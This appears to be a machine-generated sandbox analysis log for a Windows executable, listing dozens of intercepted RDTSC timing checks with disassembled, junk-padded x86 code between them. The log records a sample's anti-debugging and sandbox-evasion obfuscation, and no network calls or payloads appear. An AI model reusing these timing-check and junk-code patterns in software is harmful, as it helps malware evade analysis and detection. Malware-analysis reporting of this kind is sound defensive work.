Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B7094D second address: 4B70985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA0AD4759E3h 0x0000000a add si, B82Eh 0x0000000f jmp 00007FA0AD4759E9h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70896 second address: 4B708F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 mov eax, 3EE8566Fh 0x0000000e pushfd 0x0000000f jmp 00007FA0AD455114h 0x00000014 sbb cx, 7A98h 0x00000019 jmp 00007FA0AD45510Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 mov cl, 8Ah 0x00000026 mov edi, 0593AA74h 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e jmp 00007FA0AD455113h 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov di, B772h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B708F5 second address: 4B708FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B708FB second address: 4B708FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70543 second address: 4B705B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA0AD4759DDh 0x00000009 pop ecx 0x0000000a popad 0x0000000b popad 0x0000000c push ebp 0x0000000d jmp 00007FA0AD4759DCh 0x00000012 mov dword ptr [esp], ebp 0x00000015 jmp 00007FA0AD4759E0h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FA0AD4759DDh 0x00000025 adc ax, B4A6h 0x0000002a jmp 00007FA0AD4759E1h 0x0000002f popfd 0x00000030 call 00007FA0AD4759E0h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B705B3 second address: 4B705E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA0AD455117h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80349 second address: 4B8034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8034D second address: 4B80368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455117h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80368 second address: 4B8038C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dl, 01h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8038C second address: 4B803A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B803A8 second address: 4B803AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B803AC second address: 4B803B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0E6B second address: 4BB0E91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA0AD4759E4h 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ecx, edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B9073E second address: 4B90753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD455111h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90753 second address: 4B90764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bl, CCh 0x0000000e push eax 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90764 second address: 4B9076A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B9076A second address: 4B90788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90788 second address: 4B9078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70743 second address: 4B70749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70749 second address: 4B7074D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B7074D second address: 4B70813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cx, 259Bh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA0AD4759DEh 0x00000018 and ecx, 54439468h 0x0000001e jmp 00007FA0AD4759DBh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FA0AD4759E8h 0x0000002a sbb cx, 66C8h 0x0000002f jmp 00007FA0AD4759DBh 0x00000034 popfd 0x00000035 popad 0x00000036 popad 0x00000037 push eax 0x00000038 jmp 00007FA0AD4759E9h 0x0000003d xchg eax, ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jmp 00007FA0AD4759E3h 0x00000046 pushfd 0x00000047 jmp 00007FA0AD4759E8h 0x0000004c jmp 00007FA0AD4759E5h 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70813 second address: 4B70819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70819 second address: 4B7081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B7081D second address: 4B7085A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007FA0AD455114h 0x00000013 pop ebx 0x00000014 push esi 0x00000015 mov ecx, ebx 0x00000017 pop edi 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B7085A second address: 4B70860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B901E4 second address: 4B901E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B901E8 second address: 4B901FE instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA0AD4759DAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B901FE second address: 4B90202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90202 second address: 4B90208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90208 second address: 4B90258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA0AD45510Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FA0AD455116h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA0AD455117h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90258 second address: 4B9025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B9025E second address: 4B90262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90262 second address: 4B90266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90557 second address: 4B9057E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FA0AD455114h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B9057E second address: 4B9059F instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e call 00007FA0AD4759E1h 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B9059F second address: 4B905F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA0AD45510Ch 0x00000009 xor si, F2E8h 0x0000000e jmp 00007FA0AD45510Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushad 0x0000001a push edx 0x0000001b pop ecx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f jmp 00007FA0AD455113h 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FA0AD455110h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B905F5 second address: 4B90604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB06C0 second address: 4BB06C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB06C6 second address: 4BB0703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bx, 56C4h 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 mov eax, 09897AEBh 0x00000018 popad 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c jmp 00007FA0AD4759DCh 0x00000021 mov bx, ax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0703 second address: 4BB0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0707 second address: 4BB070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB070B second address: 4BB0711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0711 second address: 4BB073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA0AD4759E7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB073F second address: 4BB0745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0745 second address: 4BB075C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB075C second address: 4BB07D8 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, F003h 0x0000000b popad 0x0000000c xchg eax, ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA0AD455112h 0x00000015 adc esi, 4B4849C8h 0x0000001b jmp 00007FA0AD45510Bh 0x00000020 popfd 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007FA0AD455116h 0x0000002a xor ax, 4C28h 0x0000002f jmp 00007FA0AD45510Bh 0x00000034 popfd 0x00000035 popad 0x00000036 mov eax, dword ptr [778165FCh] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA0AD455115h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB07D8 second address: 4BB07DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB07DE second address: 4BB07E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB07E2 second address: 4BB083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b call 00007FA0AD4759E5h 0x00000010 call 00007FA0AD4759E0h 0x00000015 pop eax 0x00000016 pop ebx 0x00000017 movzx eax, dx 0x0000001a popad 0x0000001b je 00007FA120058B24h 0x00000021 jmp 00007FA0AD4759E3h 0x00000026 mov ecx, eax 0x00000028 pushad 0x00000029 popad 0x0000002a xor eax, dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ecx, ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB083E second address: 4BB084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD45510Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB084F second address: 4BB0886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b jmp 00007FA0AD4759DDh 0x00000010 ror eax, cl 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007FA0AD4759DAh 0x0000001b sub al, 00000038h 0x0000001e jmp 00007FA0AD4759DBh 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0886 second address: 4BB08AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ch, 99h 0x0000000b popad 0x0000000c leave 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dh, 6Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB08AB second address: 4BB08AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB08AF second address: 4BB0908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA0AD455110h 0x0000000b popad 0x0000000c retn 0004h 0x0000000f nop 0x00000010 mov esi, eax 0x00000012 lea eax, dword ptr [ebp-08h] 0x00000015 xor esi, dword ptr [00C92014h] 0x0000001b push eax 0x0000001c push eax 0x0000001d push eax 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 push eax 0x00000022 call 00007FA0B13B59DFh 0x00000027 push FFFFFFFEh 0x00000029 jmp 00007FA0AD455110h 0x0000002e pop eax 0x0000002f jmp 00007FA0AD455110h 0x00000034 ret 0x00000035 nop 0x00000036 push eax 0x00000037 call 00007FA0B13B59FCh 0x0000003c mov edi, edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA0AD455117h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0908 second address: 4BB090E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB090E second address: 4BB0912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0912 second address: 4BB0965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 17ECF0A6h 0x00000014 pushfd 0x00000015 jmp 00007FA0AD4759E7h 0x0000001a sub ecx, 45BA732Eh 0x00000020 jmp 00007FA0AD4759E9h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0965 second address: 4BB096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB096B second address: 4BB096F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB096F second address: 4BB098C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FA0AD45510Bh 0x00000011 pop ecx 0x00000012 mov bx, ECECh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB098C second address: 4BB0992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0992 second address: 4BB0996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B6006F second address: 4B600D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA0AD4759DCh 0x00000009 or ah, FFFFFFD8h 0x0000000c jmp 00007FA0AD4759DBh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 and esp, FFFFFFF8h 0x00000018 jmp 00007FA0AD4759E5h 0x0000001d xchg eax, ecx 0x0000001e pushad 0x0000001f call 00007FA0AD4759DCh 0x00000024 jmp 00007FA0AD4759E2h 0x00000029 pop ecx 0x0000002a push ebx 0x0000002b mov al, 08h 0x0000002d pop ebx 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B600D5 second address: 4B600FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA0AD455110h 0x0000000a or eax, 3C7EBBF8h 0x00000010 jmp 00007FA0AD45510Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B600FD second address: 4B60103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B60103 second address: 4B60107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B60107 second address: 4B6010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B6010B second address: 4B6018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a push edi 0x0000000b pushfd 0x0000000c jmp 00007FA0AD455118h 0x00000011 and ecx, 0E794588h 0x00000017 jmp 00007FA0AD45510Bh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e mov bx, 93CCh 0x00000022 popad 0x00000023 push ebx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FA0AD45510Eh 0x0000002b jmp 00007FA0AD455115h 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp], ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA0AD455118h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B6018C second address: 4B60245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA0AD4759E1h 0x00000009 sub ax, C766h 0x0000000e jmp 00007FA0AD4759E1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA0AD4759E0h 0x0000001a and ch, 00000008h 0x0000001d jmp 00007FA0AD4759DBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov ebx, dword ptr [ebp+10h] 0x00000029 jmp 00007FA0AD4759E6h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA0AD4759DEh 0x00000036 xor esi, 6EBF2498h 0x0000003c jmp 00007FA0AD4759DBh 0x00000041 popfd 0x00000042 movzx esi, di 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 mov ebx, eax 0x0000004a mov eax, 4E43ADE3h 0x0000004f popad 0x00000050 xchg eax, esi 0x00000051 pushad 0x00000052 mov ebx, ecx 0x00000054 movzx ecx, dx 0x00000057 popad 0x00000058 mov esi, dword ptr [ebp+08h] 0x0000005b pushad 0x0000005c mov bh, E2h 0x0000005e mov esi, 4D275F41h 0x00000063 popad 0x00000064 xchg eax, edi 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 mov edx, 3811526Ch 0x0000006d mov eax, edi 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B60245 second address: 4B6025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
